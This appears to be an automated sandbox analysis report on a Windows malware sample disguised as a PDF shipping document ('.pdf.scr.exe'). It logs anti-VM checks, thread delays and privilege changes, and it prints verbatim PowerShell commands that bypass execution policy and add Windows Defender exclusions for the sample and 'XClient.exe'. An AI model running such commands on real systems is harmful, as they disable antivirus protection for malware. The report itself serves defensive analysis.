Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe PID: 3608, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Memory allocated: AD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Memory allocated: 2A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Memory allocated: 28C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Memory allocated: 8980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Memory allocated: 9980000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Memory allocated: 9B80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Memory allocated: AB80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Memory allocated: 13C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Memory allocated: 2EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Memory allocated: 2DE0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Window / User API: threadDelayed 6510	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Window / User API: threadDelayed 3313	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6898	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2787	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6230	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3565	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7414	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2322	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2997
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6630

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe TID: 1536	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe TID: 3136	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe TID: 6660	Thread sleep count: 6510 > 30	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe TID: 6660	Thread sleep count: 3313 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1436	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2752	Thread sleep count: 6230 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1272	Thread sleep count: 3565 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5472	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4052	Thread sleep count: 7414 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4052	Thread sleep count: 2322 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136	Thread sleep time: -5534023222112862s >= -30000s

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe, 00000003.00000002.4530484778.0000000001074000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe'
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe'	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior

Bypasses PowerShell execution policy

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe'

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe "C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe'	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe'	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior

Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\F41355 SO 7670 HBL EXPRESS RELEASEpdf.pdf.scr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
